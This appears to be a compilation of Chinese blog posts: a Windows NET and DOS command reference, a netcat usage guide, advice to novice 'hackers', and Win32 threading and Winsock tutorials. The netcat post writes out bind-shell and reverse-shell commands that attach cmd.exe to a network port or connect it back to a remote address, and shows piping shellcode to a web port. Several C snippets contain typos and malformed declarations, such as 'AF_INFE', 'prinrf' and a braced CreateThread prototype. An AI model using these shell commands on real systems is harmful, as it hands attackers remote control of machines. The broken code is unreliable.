net命令介绍
这篇文章综合了WINDOWS 98,WINDOWS WORKSTATION和WINDOWS SERVER 三个操作系 统关于NET命令的解释,希望可以全面一些 先说一些: (1)NET命令是一个命令行命令。 (2)管理网络环境、服务、用户、登陆。。。。等本地信息 (3)WIN 98,WIN WORKSTATION和WIN NT都内置了NET命令。 (4)但WIN 98的NET命令和WORKSTATION、NT的NET命令不同。 (5)WORKSTATION和SERVER中的NET命令基本相同。 (6)获得HELP <1>在NT下可以用图形的方式,开始-》帮助-》索引-》输入NET <2>在COMMAND下可以用字符方式,NET /?或NET或NET HELP得到一些方法 相应的方 法的帮助NET COMMAND /HELP或NET HELP COMMAND 或NET COMMAND /? 另对于错误 NET HELPMSG MESSAGE#是4位数 (7)强制参数 所有net命令接受选项/yes和/no(可缩写为/y和/n)。[简单的说就是 预先给系统的 提问一个答案] (8)有一些命令是马上产生作用并永久保存的,使用的时候要慎重 (9)对于NET命令的功能都可以找到相应的图形工具的解决方案 (10)命令的组成 命令 参数 选项 | 参数 选项 | 参数 选项 |。。。。。。 瘰疬罗嗦说了一大堆,其实就是6和7有用,呵呵 另有两件事: (1)在NT的NET命令中有一些参数是只有在SERVER环境中才能使用的 (2)在WIN98的NET命令中有一些参数不能在DOS-WIN中使用,只能在DOS环境中使用 下面对NET命令的不同参数的基本用法做一些初步的介绍: (1)NET VIEW 作 用:显示域列表、计算机列表或指定计算机的共享资源列表。 命令格式:net view [//computername | /domain[:domainname]] 参数介绍: <1>键入不带参数的net view显示当前域的计算机列表。 <2>//computername 指定要查看其共享资源的计算机。 <3>/domain[:domainname]指定要查看其可用计算机的域 简单事例 <1>net view //YFANG查看YFANG的共享资源列表。 <2>net view /domain:LOVE查看LOVE域中的机器列表。 (2)NET USER 作 用:添加或更改用户帐号或显示用户帐号信息。该命令也可以写为 net users 。 命令格式:net user [username [password | *] [options]] [/domain] 参数介绍: <1>键入不带参数的net user查看计算机上的用户帐号列表。 <2>username添加、删除、更改或查看用户帐号名。 <3>password为用户帐号分配或更改密码。 <4>*提示输入密码。 <5>/domain在计算机主域的主域控制器中执行操作。 简单事例: <1>net user yfang查看用户YFANG的信息 (3)NET USE 作用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。 命令格式:net use [devicename | *] [//computername/sharename[/volume]] [password | *]] [/user:[domainname/]username] [[/delete] | [/persistent:{yes | no}]] 参数介绍: 键入不带参数的net use列出网络连接。 devicename指定要连接到的资源名称或要断开的设备名称。 //computername/sharename服务器及共享资源的名称。 password访问共享资源的密码。 *提示键入密码。 /user指定进行连接的另外一个用户。 domainname指定另一个域。 username指定登录的用户名。 /home将用户连接到其宿主目录 /delete取消指定网络连接。 /persistent控制永久网络连接的使用。 简单事例: <1>net use e: //YFANG/TEMP将//YFANG/TEMP目录建立为E盘 <2>net use e: //YFANG/TEMP /delete断开连接 (4)NET TIME 作 用:使计算机的时钟与另一台计算机或域的时间同步。 命令格式:net time [//computername | /domain[:name]] [/set] 参数介绍: <1>//computername要检查或同步的服务器名。 <2>/domain[:name]指定要与其时间同步的域。 <3>/set使本计算机时钟与指定计算机或域的时钟同步。 下面的这4个参数是相关的,所以一起介绍 (5)Net Start 作 用:启动服务,或显示已启动服务的列表。 命令格式:net start service (6)Net Pause 作 用:暂停正在运行的服务。 命令格式:net pause service (7)Net Continue 作 用:重新激活挂起的服务。 命令格式:net continue service (8)NET STOP 作 用:停止 Windows NT 网络服务。 命令格式:net stop service 参数介绍:我们来看看这些服务都是什么 <1>alerter(警报) <2>client service for netware(Netware 客户端服务) <3>clipbook server(剪贴簿服务器) <4>computer browser(计算机浏览器) <5>directory replicator(目录复制器) <6>ftp publishing service (ftp )(ftp 发行服务) <7>lpdsvc <8>net logon(网络登录) <9>network dde网络 dde) <10>network dde dsdm(网络 dde dsdm) <11>network monitor agent(网络监控代理) <12>nt lm security support provider(NT LM 安全性支持提供) <13>ole(对象链接与嵌入) <14>remote access connection manager(远程访问连接管理器) <15>remote access isnsap service(远程访问 isnsap 服务) <16>remote access server(远程访问服务器) <17>remote procedure call (rpc) locator(远程过程调用定位器) <18>remote procedure call (rpc) service(远程过程调用服务) <19>schedule(调度) <20>server(服务器) <21>simple tcp/ip services(简单 TCP/IP 服务) <22>snmp <23>spooler(后台打印程序) <24>tcp/ip netbios helper(TCP/IP NETBIOS 辅助工具) <25>ups (26)workstation(工作站) <27>messenger(信使) <28>dhcp client <29>eventlog 以下这些SERVICE只能在NT SERVER上使用 << 1>>)file server for macintosh <<2>>gateway service for netware <<3>>microsoft dhcp server <<4>>print server for macintosh <<5>>remoteboot <<6>>windows internet name service (9)Net Statistics 作 用:显示本地工作站或服务器服务的统计记录。 命令格式:net statistics [workstation | server] 参数介绍: <1>键入不带参数的net statistics列出其统计信息可用的运行服务。 <2>workstation显示本地工作站服务的统计信息。 <3>server显示本地服务器服务的统计信息。 简单事例: <1>net statistics server | more显示服务器服务的统计信息 (10)Net Share 作 用:创建、删除或显示共享资源。 命令格式:net share sharename=drive:path [/users:number | /unlimited] [/remark:"text"] 参数介绍: <1>键入不带参数的net share显示本地计算机上所有共享资源的信息。 <2>sharename是共享资源的网络名称。 <3>drive:path指定共享目录的绝对路径。 <4>/users:number设置可同时访问共享资源的最大用户数。 <5>/unlimited不限制同时访问共享资源的用户数。 <6>/remark:"text "添加关于资源的注释,注释文字用引号引住。 简单事例: <1>net share mylove=c:/temp /remark:"my first share"以mylove为共享名共享 C:/temp <2>net share mylove /delete停止共享mylove目录 (11)Net Session 作 用:列出或断开本地计算机和与之连接的客户端的会话,也可以写为net sessions或net sess。 命令格式:net session [//computername] [/delete] 参数介绍: <1>键入不带参数的net session显示所有与本地计算机的会话的信息。 <2>//computername标识要列出或断开会话的计算机。 <3>/delete结束与//computername计算机会话并关闭本次会话期间计算机的所有 ? 简单事例: <1>net session //YFANG要显示计算机名为YFANG的客户端会话信息列表。 (12)Net Send 作 用:向网络的其他用户、计算机或通信名发送消息。 命令格式:net send {name | * | /domain[:name] | /users} message 参数介绍 : <1>name要接收发送消息的用户名、计算机名或通信名。 <2>*将消息发送到组中所有名称。 <3>/domain[:name]将消息发送到计算机域中的所有名称。 <4>/users将消息发送到与服务器连接的所有用户。 <5>message作为消息发送的文本。 简单事例: <1>net send /users server will shutdown in 5 minutes. 给所有连接到服务器 的用户发送消息 (13)Net Print 作 用:显示或控制打印作业及打印队列。 命令格式:net print [//computername ] job# [/hold | /release | /delete] 参数介绍: <1>computername共享打印机队列的计算机名。 <2>sharename打印队列名称。 <3>job#在打印机队列中分配给打印作业的标识号。 <4>/hold使用 job# 时,在打印机队列中使打印作业等待。 <5>/release释放保留的打印作业。 <6>/delete从打印机队列中删除打印作业。 简单事例: <1>net print //YFANG/SEEME列出//YFANG计算机上SEEME打印机队列的目录 (14)Net Name 作 用:添加或删除消息名(有时也称别名),或显示计算机接收消息的名称列表 。 命令格式:net name [name [/add | /delete]] 参数介绍: <1>键入不带参数的net name列出当前使用的名称。 <2>name指定接收消息的名称。 <3>/add将名称添加到计算机中。 <4>/delete从计算机中删除名称。 (15)Net Localgroup 作 用:添加、显示或更改本地组。 命令格式:net localgroup groupname {/add [/comment:"text "] | /delete} [/domain] 参数介绍: <1>键入不带参数的net localgroup显示服务器名称和计算机的本地组名称。 <2>groupname要添加、扩充或删除的本地组名称。 <3>/comment: "text "为新建或现有组添加注释。 <4>/domain在当前域的主域控制器中执行操作,否则仅在本地计算机上执行操作 ? <5>name [ ...]列出要添加到本地组或从本地组中删除的一个或多个用户名或组名 。 <6>/add将全局组名或用户名添加到本地组中。 <7>/delete从本地组中删除组名或用户名。 简单事例: <1>net localgroup love /add将名为love的本地组添加到本地用户帐号数据库 <2>net localgroup love显示love本地组中的用户 (16)Net Group 作 用:在 Windows NT Server 域中添加、显示或更改全局组。 命令格式:net group groupname {/add [/comment:"text "] | /delete} [/domain] 参数介绍: <1>键入不带参数的net group显示服务器名称及服务器的组名称。 <2>groupname要添加、扩展或删除的组。 <3>/comment:"text "为新建组或现有组添加注释。 <4>/domain在当前域的主域控 制器中执行该操作,否则在本地计算机上执行操作? <5>username[ ...]列表显示要添加到组或从组中删除的一个或多个用户。 <6>/add添加组或在组中添加用户名。 <7>/delete删除组或从组中删除用户名。 简单事例: <1>net group love yfang1 yfang2 /add将现有用户帐号yfang1和yfang2添加到本 地计算机的love组 (17)Net File 作 用:显示某服务器上所有打开的共享文件名及锁定文件数。 命令格式:net file [id [/close]] 参数介绍: <1>键入不带参数的net file获得服务器上打开文件的列表。 <2>id文件标识号。 <3>/close关闭打开的文件并释放锁定记录。 (18)Net Config 作 用:显示当前运行的可配置服务,或显示并更改某项服务的设置。 命令格式:net config [service [options]] 参数介绍: <1>键入不带参数的net config显示可配置服务的列表。 <2>service通过net config命令进行配置的服务(server或workstation) <3>options服务的特定选项。 (19)Net Computer 作 用:从域数据库中添加或删除计算机。 命令格式:net computer //computername {/add | /del} 参数介绍: <1>//computername指定要添加到域或从域中删除的计算机。 <2>/add将指定计算机添加到域。 <3>/del将指定计算机从域中删除。 简单事例: <1>net computer //cc /add将计算机 cc 添加到登录域 (20)Net Accounts 作 用:更新用户帐号数据库、更改密码及所有帐号的登录要求。 命令格式:net accounts [/forcelogoff:{minutes | no}] [/minpwlen: length] [/maxpwage:{days | unlimited}] [/minpwage:days] [/uniquepw: number] [/domain] 参数介绍: <1>键入不带参数的net accounts显示当前密码设置、登录时限及域信息。 <2>/forcelogoff:{minutes | no}设置当用户帐号或有效登录时间过期时 <3>/minpwlen:length设置用户帐号密码的最少字符数。 <4>/maxpwage:{days | unlimited}设置用户帐号密码有效的最大天数。 <5>/minpwage:days设置用户必须保持原密码的最小天数。 <6>/uniquepw:number要求用户更改密码时,必须在经过number次后才能重复使用 与之相同的密码。 <7>/domain在当前域的主域控制器上执行该操作。 <8>/sync当用于主域控制器时 ,该命令使域中所有备份域控制器同步 简单事例: <1>net accounts /minpwlen:7 将用户帐号密码的最少字符数设置为7 ----------------------上面介绍的是NET命令在WINNT下的基本用法 ----------------------下面我们看看NET命令在WIN98下的基本用法 在WIN98中NET命令也有一些参数 其中有一些参数的名字和功能及简单的使用方法 和WINNT下的相应的参数的用法相同 其中有 (1)NET TIME命令 (2)NET PRINT命令 (3)NET USE命令 (4)NET VIEW命令 在WIN98中NET命令有一些参数 其中有一些参数的名字和WINNT下的相应的参数的名 字相同但其用法却有些不同 其中有 (1)NET START 作 用:启动相应的服务。(不能在DOS-WIN中用) 命令格式:NET START [BASIC | NWREDIR | WORKSTATION | NETBIND | NETBEUI | NWLINK] [/LIST] [/YES] [/VERBOSE] (2)NET STOP 作 用:停止相应的服务.(不能在DOS-WIN中用) 命令格式:NET STOP [BASIC | NWREDIR | WORKSTATION | NETBEUI | NWLINK] [/YES] 在WIN98中NET命令还有一些参数是在98下才有的 其中有 (1)NET DIAG 作 用:运行MS的DIAGNOSTICS程序显示网络的DIAGNOSTIC信息 命令格式:NET DIAGNOSTICS [/NAMES | /STATUS] (2)NET INIT 作 用:不通过绑定来加载协议或网卡驱动(不能在DOS-WIN中用) 命令格式:NET INITIALIZE [/DYNAMIC] (3)NET LOGOFF 作 用:断开连接的共享资源(不能在DOS-WIN中用) (4)NET LOGON 作 用:在WORKGROUP中登陆(不能在DOS-WIN中用) 命令格式:NET LOGON [user [password | ?]] [/DOMAIN:name] [/YES] [/SAVEPW:NO] (5)NET PASSWORD 作 用:更改你的网络登陆口令(不能在DOS-WIN中用) 命令格式:NET PASSWORD //computer | /DOMAIN:name [user [oldpassword [newpassword]]]
2:40 |
添加评论
|
固定链接
|
引用通告 (0)
|
写入日志
|
收藏
9月4日
Dos常用命令
一、基础命令 1 dir 无参数:查看当前所在目录的文件和文件夹。 /s:查看当前目录已经其所有子目录的文件和文件夹。 /a:查看包括隐含文件的所有文件。 /ah:只显示出隐含文件。 /w:以紧凑方式(一行显示5个文件)显示文件和文件夹。 /p:以分页方式(显示一页之后会自动暂停)显示。 |more:前面那个符号是“/”上面的那个,叫做重定向符号,就是把一个 命令的结果输出为另外一个命令的参数。more也是一个命令,dir /w |more 得到的结果和dir /w /p的结果是一样的。 其他的参数大家可以用:dir/?查看。
2 cd cd 目录名:进入特定的目录。如果看到有个目录显示为:abcdef ghi 就 输入:cdabcdef.ghi进入该目录。 cd/ 退回到根目录。 cd..退回到上一级目录。
3 md rd md 目录名:建立特定的文件夹。 (dos下面习惯叫目录,win下面习惯叫文 件夹。呵呵!) rd 目录名:删除特定的文件夹。
4 cls 清除屏幕。
5 copy copy 路径/文件名 路径/文件名 :把一个文件拷贝到另一个地方。
6 move move 路径/文件名 路径/文件名 :把一个文件移动(就是剪切+复制)到另 一个地方。
7 del del 文件名:删除一个文件。 del *.*:删除当前文件夹下所有文件。 del不能删除文件夹。
8 deltree 删除文件夹和它下面的所有子文件夹还有文件,厉害。。。不要乱用。
9 format format x: :x代表盘符,格式化一个分区。在dos下是用fat文件系统格式 化的,在windows2000安装的时候会问你要不要转换为ntfs。
10 type type 文本文件名:显示出文本文件的内容。
11 edit 其实这是个小程序,编辑文本文件用的。
12 ren ren 旧文件名 新文件名:改文件名。
二、关于网络的常用命令 1 ping ping 主机ip或名字:向目标主机发送4个icmp数据包,测试对方主机是否收 到并响应,一般常用于做普通网络是否通畅的测试。但是ping不同不代表网 络不通,有可能是目标主机装有防火墙并且阻止了icmp响应。 ping -t :不停的发送数据包。当然都很小,不能称作攻击。有些人自己写 了一些类似于ping命令的程序,不停的发送很大的数据包,以阻塞目标主机 的网络连接。
2 net 建议是用net /?获取具体帮助信息。实在是有很多参数,参数下面还有参 数。常用:net view //主机 来看共享,net start/stop 服务 来启动和停 止服务,信使服务个人不太喜欢。
3 netstat netstat 主机:查看主机当前的tcp/ip连接状态,如端口的状态。
4 nbtstat nbtstat 主机:查看主机使用的NetBIOS name。
5 tracert tracert 主机:查看从你自己到目标逐机到底经过了那些路径。如: tracert www.ncie.gov.cn 然后等待。。。就会看到你经过的一个个路由节 点,一般大一点的路由器,如电信的主干路由,除了ip以外,都有英文标示 的。
6 pathping pathping 主机:类似tracert,但可以显示一些tracert不能显示出来的信 息。可以自己试试。
7 ftp 字符方式的ftp,我喜欢用;)不用装cuteftp了。
8 telnet 字符方式的远程登录程序,是网络人员极其爱用的远程登录程序。我最近常 用来调试邮件服务器。
9 ipconfig 非常有用的网络配置、排错。。。命令。 不加参数显示当前机器的网络接口状态。 /all 先是详细的信息。 /release 释放当前ip。 /renew 重新申请ip。 /flushdns 刷新dns缓存。 /registerdns 重新栽dns服务器上注册自己。 。。。。。。
10 arp 操作当前的arp缓存。 -a 显示arp缓存。 -d 删除一条缓存纪录。 -s 田家一条缓存纪录。
11 nslookup 排除dns错误的利器。是一个交互的工具。使用之前请先努力弄清楚dns的作用以及dns的工作原理。
xcopy是一个外部命令,也就是说,是一个小程序,有的时候会发现软盘上没有,硬盘上也没有。。。昏倒。。。当然勇气来使比copy好用,我喜欢加/e参数。 smartdrv.exe 加载磁盘缓存,参数是缓存的大小,单位是kb。 如:smartdrv 32768 就是加载32M的缓存。 缓存的作用在你安装WIN2K的时候非常明显!不加缓存装WIN2K PRO要3小时左右,加载8M缓存后,只要30分钟。 原理是在内存中划分出一块区域,在安装期间不断地把硬盘上的数据读取到那块缓存区域中,充分利用了内存。
AT和任务计划作用一样。 以下是使用方法,可以通过在命令提示符下面输入:AT /?获得帮助。
AT 命令安排在特定日期和时间运行命令和程序。 要使用 AT 命令,计划服务必须已在运行中。 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ AT [//computername] [ [id] [/DELETE] | /DELETE [/YES]] AT [//computername] time [/INTERACTIVE] [ /EVERY:date[,...] | /NEXT:date[,...]] "command"
//computername 指定远程计算机。 如果省略这个参数,会计划在本地计算机上运行命令。 //127.0.0.1代表本机。和不加这个参数意思一样。
id 指定给已计划命令的识别号。 用来识别任务,比如你要添加好几个任务,ID=1就代表第一个喽!
/delete 删除某个已计划的命令。如果省略 id, 计算机上所有已计划的命令都会被删除。 /yes 不需要进一步确认时,跟删除所有作业 的命令一起使用。 time 指定运行命令的时间。 /interactive 允许作业在运行时,与当时登录的用户 桌面进行交互。 /every:date[,...] 每个月或每个星期在指定的日期运行命令。 如果省略日期,则默认为在每月的本日运行。 /next:date[,...] 指定在下一个指定日期(如,下周四)运行命令。 如果省略日期,则默认为在每月的本日运行。 "command" 准备运行的 Windows NT 命令或批处理程序。
3:11 |
添加评论
|
固定链接
|
引用通告 (0)
|
写入日志
nc(瑞士军刀)的详细使用
netcat被誉为网络安全界的'瑞士军刀',相信没有什么人不认识它吧......
一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,
能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几
乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。
在中国,它的WINDOWS版有两个版本,一个是原创者Chris Wysopal写的原版本,另一个是由'红与黑'编译
后的新'浓缩'版。'浓缩'版的主程序只有10多KB(10多KB的NC是不能完成下面所说的第4、第5种使用方法,
有此功能的原版NC好象要60KB:P),虽然"体积"小,但很完成很多工作。
<!--StartFragment-->=====================================================================================================
软件介绍:
工具名:Netcat
作者:Hobbit && Chris Wysopal
网址:
http://www.atstake.com/research/tools/network_utilities/
类别:开放源码
平台:Linux/BSD/Unix/Windows
WINDOWS下版本号:[v1.10 NT]
=====================================================================================================
参数介绍:
'nc.exe -h'即可看到各参数的使用方法。
基本格式:nc [-options] hostname port[s] [ports] ...
nc -l -p port [options] [hostname] [port]
-d 后台模式
-e prog 程序重定向,一旦连接,就执行 [危险!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i secs 延时的间隔
-l 监听模式,用于入站连接
-L 连接关闭后,仍然继续监听
-n 指定数字的IP地址,不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 随机本地及远程端口
-s addr 本地源地址
-t 使用TELNET交互方式
-u UDP模式
-v 详细输出--用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉--用于扫描时
端口的表示方法可写为M-N的范围格式。
=====================================================================================================
基本用法:
大概有以下几种用法:
1)连接到REMOTE主机,例子:
格式:nc -nvv 192.168.x.x 80
讲解:连到192.168.x.x的TCP80端口
2)监听LOCAL主机,例子:
格式:nc -l -p 80
讲解:监听本机的TCP80端口
3)扫描远程主机,例子:
格式:nc -nvv -w2 -z 192.168.x.x 80-445
讲解:扫描192.168.x.x的TCP80到TCP445的所有端口
4)REMOTE主机绑定SHELL,例子:
格式:nc -l -p 5354 -t -e c:/winnt/system32/cmd.exe
讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口
5)REMOTE主机绑定SHELL并反向连接,例子:
格式:nc -t -e c:/winnt/system32/cmd.exe 192.168.x.x 5354
讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口
以上为最基本的几种用法(其实NC的用法还有很多,
当配合管道命令"|"与重定向命令"<"、">"等等命令功能更强大......)。
=====================================================================================================
高级用法:
6)作攻击程序用,例子:
格式1:type.exe c:/exploit.txt|nc -nvv 192.168.x.x 80
格式2:nc -nvv 192.168.x.x 80 < c:/exploit.txt
讲解:连接到192.168.x.x的80端口,并在其管道中发送'c:/exploit.txt'的内容(两种格式确有相同的效果,
真是有异曲同工之妙:P)
附:'c:/exploit.txt'为shellcode等
7)作蜜罐用[1],例子:
格式:nc -L -p 80
讲解:使用'-L'(注意L是大写)可以不停地监听某一个端口,直到ctrl+c为止
8)作蜜罐用[2],例子:
格式:nc -L -p 80 > c:/log.txt
讲解:使用'-L'可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到'c:/log.txt'中,如果把'>'
改为'>>'即可以追加日志
附:'c:/log.txt'为日志等
9)作蜜罐用[3],例子:
格式1:nc -L -p 80 < c:/honeypot.txt
格式2:type.exe c:/honeypot.txt|nc -L -p 80
讲解:使用'-L'可以不停地监听某一个端口,直到ctrl+c为止,并把'c:/honeypot.txt'的内容'送'入其
管道中
注意:要想溢出,最好是在外网,内网要搞端口映射才可以哦!
2:20 |
添加评论
|
固定链接
|
引用通告 (0)
|
写入日志
想学到真正的黑客技术?进来看看!
我虽然是个小菜鸟!但是还是要劝告刚刚接触网络的人
1,不要研究QQ,毕竟QQ不是技术,盗了几个号又算什么?程序不是自己编写的,没什么值得骄傲的.
2,不要研究怎么破解网吧,难道不觉得:一般关于破解网吧的帖子都很少人回复的么?
3,研究一些系统知识,比如windows什么版本和什么版本有什么区别……
4,研究组策略,研究注册表,研究CMD,研究ASP,研究PHP,研究JAVA……
5,经常来BBS闲逛,例如X,黑防……
6,不要以为扫到**主机的**端口开放就可以利用什么,微软不是傻的!
7,尽量不要吧时间浪费在暴力破解上,因为机会很渺茫!无路可走时才可以用用。
8,不要认为黑客就是非法入侵,就是盗QQ,盗帐号。
9,祖国需要计算机人才,而不需要盗帐号的高手。
10,不要奢望有什么快速的途径学习技术,欲速则不达!没有丰富的经验是没有办法提高的。
如果说错什么,大家都可以指出来~!
对学习技术的一些建议(按顺序去学):
1,认真看看过去的入侵实例(如IPC入侵,输入法漏洞),这样可以好好研究windows基础。
2,学好注册表,因为注册表是windows的数据库,windows相关的数据都在那。
3,多少学些编程,basic都可以,目的是做好基础,了解了解什么是编程。
4,看看一些溢出工具编写的教程(不是让你去写,而是让你了解溢出的真正原理),明白原理之后自己用虚拟机实践一下溢出。
5,有了编程的经验后,就可以看看sql注入攻击了,并且要学习怎么使用NBSI.
学好了这些,基本上就算入门了,想真正提高,只有努力学好编程,不要认为编程离我们很远……也许你会认为用别人的工具也不错,但是不会编程,就永远发现不了windows的系统漏洞,老是使用公布过的漏洞利用程序,想提高还真难啊.
再给一个建议........做一个虚拟机,独立安装一个2000的系统(版本越老越好),然后尽量完善那个系统,看看自己能不能成功入侵(这是积累经验的办法).
这篇帖子没有知识,只是提供一个方向.学技术需要时间,心急是万万不可Di~~~
我的电脑里有数千个资料文件,都是网上找的.所以我再再建议...:经常逛逛下载站,找找相关资料,并且下载,还有经常去技术blog,把有用的复制保存下来,多少浏览一遍,感兴趣的就认真看(还要用本子记下有用的资料),不感兴趣的就扫一遍.
这个方法其实比你买<X>学技术还要快.
好多人问为什么我老是菜鸟,想知道答案?该学的东西你没去认真的学,不该学的你又浪费时间在钻研,当然提高不了了!
附:什么是有用的资料(例如:windows2000的日志存放处,VPN开启的必须条件,windows_HOME版本的XP不支持"用户与组"功能和没有IIS......)
2:19 |
添加评论
|
固定链接
|
引用通告 (0)
|
写入日志
黑客初级知识5
第五节 多线程编程介绍
对于多线程的基本概念,我不在赘述,是个只要学习过一门编程语言就应该多进程和线程有个基本的了解.这里重点介绍一下如何实现多线程.
通常一个程序的主线程有操作系统创建,如果想让其创建额外的线程,可以调用CreateThread()函数来完成.函数原形如下:
HANDLE CreateThread()
{
LPSECURITY_ATTRIBUTES LPThreadAttributes, //指向SECURITY_ATTRIBUTES的指针
SIZE_T dwStackSize, //表示线程为自己所用堆栈分配的地址空间的大小 系统缺省值为0
LPTHREAD_START-TOUTINE lpStartAddress, //表示新线程开始执行时代码所在函数的地址 即线程函数名
LPVOID lpParameter, //是传入线程函数的参数
DWORD dwCreationFlags, //指定控制线程创建的附加标志 取0线程立即执行 取CREATE_SUSPENDED线程挂起
LPDWORD lpThreadld //是个DWORD类型的地址,返回赋给该新线程的ID
}
线程函数lpParameter必须有以下原形:
DWORD WINAPI XXXThreadFun(LPVOID lpParameter)
{
return(0);
}
________________________________________________________________________________________________
下面我们来创建一个线程:
#include <windows.h>
#include <stdio.h>
DWORD WINAPI ThreadFunc( LPVOID lpParam ) //线程函数,跟普通的函数没什么两样
{
printf( "Parameter = %d.", *(DWORD*)lpParam );
return 0;
}
VOID main( VOID )
{
DWORD dwThreadId, dwThrdParam = 1;
HANDLE hThread;
hThread = CreateThread( NULL,0,ThreadFunc,&dwThrdParam, 0,&dwThreadId);
if (hThread == NULL)
{
printf( "CreateThread failed (%d)/n", GetLastError() );
}
else
{
_getch();
CloseHandle( hThread );
}
}
关于线程同步的问题,这里就不再讲解,请大家自己查阅资料,不查阅以后可能会有困难啊.培养一下各位的自己动手能力.
2:03 |
添加评论
|
固定链接
|
引用通告 (0)
|
写入日志
黑客初级知识4
第四节 关于服务器和客户端编程
在网络编程中,最常用和最基础的就是WINSOCK. 现在我们讨论WINDOWS下的SOCKET编程.
大凡在WIN32平台上的WINSOCK编程都要经过下列步骤:
定义变量->获得WINDOCK版本->加载WINSOCK库->初始化->创建套接字->设置套接字选项->关闭套接字->卸载WINSOCK库->释放资源
下面介绍WINSOCK C/S的建立过程:
服务器 客户端
________________________________________________
1 初始化WSA 1 初始化WSA
____________________________________________________
2 建立一个SOCKET 2 建立一个SOCKET
_____________________________________________________
3 绑定SOCKET 3 连接到服务器
_____________________________________________________
4 在指定的端口监听 4 发送和接受数据
_____________________________________________________
5 接受一个连接 5 断开连接
______________________________________________________-
6 发送和接受数据
___________________________________________________
7 断开连接
__________________________________________________
大家注意,在VC中进行WINSOCK编程时,需要引入如下两个库文件:WINSOCK.H(这个是WINSOCK API的头文件,WIN2K以上支持WINSOCK2,所以
可以用WINSOCK2.H);Ws2_32.lib(WINSOCK API连接库文件).
使用方式如下:
#include <winsock.h>
#pragma comment(lib,"ws2_32.lib")
下面我们通过具体的代码演示服务器和客户端的工作流程:
首先,建立一个WSADATA结构,通常用wsaData
WSADATA wsaData;
然后,调用WSAStartup函数,这个函数是连接应用程序与winsock.dll的第一个调用.其中,第一个参数是WINSOCK 版本号,第二个参数是指向
WSADATA的指针.该函数返回一个INT型值,通过检查这个值来确定初始化是否成功.调用格式如下:WSAStartup(MAKEWORD(2,2),&wsaData),其中
MAKEWORD(2,2)表示使用WINSOCK2版本.wsaData用来存储系统传回的关于WINSOCK的资料.
if(iResuit=WSAStartup(MAKEWORD(2,2),&wsaData)!=0)
{
printf("WSAStartup failed:%d",GetLastError()); //返回值不等与0,说明初始化失败
ExitProcess(); //退出程序
}
应用程序在完成对请求的SOCKET库使用后,要调用WSACleanup函数来接触SOCKET库的绑定,并且释放资源.
注意WSAStartup初始化后,必须建立一个SOCKET结构来保存SOCKET句柄.
下面我们建立一个SOCKET.
首先我们建立一个m_socket的SOCKET句柄,接着调用socket()函数,函数返回值保存在m_socket中.我们使用AF_INFE,SOCK_STREAM,IPPROTO_TCP
三个参数.第一个表示地址族,AF_INFE表示TCP/IP族,第二个表示服务类型,在WINSOCK2中,SOCKET支持以下三种类型;
SOCK_STREAM 流式套接字
SOCK_DGRAM 数据报套接字
SOCK_RAW 原始套接字
第三个参数表示协议:
IPPROTO_UDP UDP协议 用于无连接数据报套接字
IPPROTO_TCP TCP协议 用于流式套接字
IPPROTO_ICMP ICMP协议用于原始套接字
m_socket=socket(AF_INFE,SOCK_STREAM,IPPROTO_TCP); //创建TCP协议
以下代码用于检查返回值是否有错误:
if(m_scoket==INVALID_SOCKET)
{
prinrf("Error at socket():%d/n",GetLastError());
WSACleanup(); //释放资源
return;
}
说明,如果socket()调用失败,他将返回INVALID_SOCKET.
为了服务器能接受一个连接,他必须绑定一个网络地址,下面的代码展示如何绑定一个已经初始化的IP和端口的Socket.客户端程序用这个
IP地址和端口来连接服务器.
sockaddr_in service;
service.sin_family=AF_INET; //INTERNET地址族
service.sin_addr.s_addr=inet_addr("127.0.0.1"); //将要绑定的本地IP地址
service.sin_port=htons(27015); //27015将要绑定的端口
下面我们调用BIND函数,把SOCKET和SOCKADDR以参数的形式传入,并检查错误.
if(bind(m_socket,(SOCKADDR*)&SERVICE,sizeof(service))==SOCKET_ERROR)
{
printf("bind() failed./n");
closesocket(m_socket);
return;
}
当绑定完成后,服务器必须建立一个监听队列,以接受客户端的请求.listen()使服务器进入监听状态,该函数调用成功返回0,否则返回
SOCKET_ERROR.代码如下:
if(listen(m_socket,1)==SOCKET-ERROR)
{
printf("error listening on socket./n");
}
服务器端调用完LISTEN()后,如果此时客户端调用CONNECT()函数,服务器端必须在调用ACCEPT().这样服务器和客户端才算正式完成通信程序的
连接动作.
一旦服务器开始监听,我们就要指定一个句柄来表示利用ACCEPT()函数接受的连接,这个句柄是用来发送和接受数据的表示.建立一个SOCKET句柄
Socket AcceptSocket 然后利用无限循环来检测是否有连接传入.一但有连接请求,ACCEPT()函数就会被调用,并且返回这次连接的句柄.
printf("waitong for a client to connect.../n");
while(1)
{
AcceptSocket=SOCKET_ERROR;
while(AcceptSocket==SOCKET_ERROR)
{
AcceptSocket=accept(m_socket,NULL,NULL);
}
}
下面看客户端端代码:
sockaddr_in clientService;
clientService.sin_family=AF_INET; //INTERNET地址族
clientService.sin_addr.s_addr=inet_addr("127.0.0.1"); //将要绑定的本地IP地址
clientService.sin_port=htons(27015); //27015将要绑定的端口
下面调用CONNECT()函数:
if ( connect( m_socket, (SOCKADDR*) &clientService, sizeof(clientService) ) == SOCKET_ERROR)
{
printf( "Failed to connect./n" );
WSACleanup();
return;
} //如果调用失败清理退出
//调用成功继续读写数据
_________________________________________________________________________________________________
到这里,服务器和客户端的基本流程介绍完毕,下面我们介绍数据交换.
send():
int send
{
SOCKET s, //指定发送端套接字
const char FAR?*buf, //指明一个存放应用程序要发送的数据的缓冲区
int len, //实际要发送的数据字节数
int flags //一般设置为0
};
C/S都用SEND函数向TCP连接的另一端发送数据.
recv():
int recv
{
SOCKET s, //指定发送端套接字
char FAR?*buf, //指明一个缓冲区 存放RECC受到的数据
int len, //指明BUF的长度
int flags //一般设置为0
};
C/S都使用RECV函数从TCP连接的另一端接受数据
_______________________________________________________________________________________________
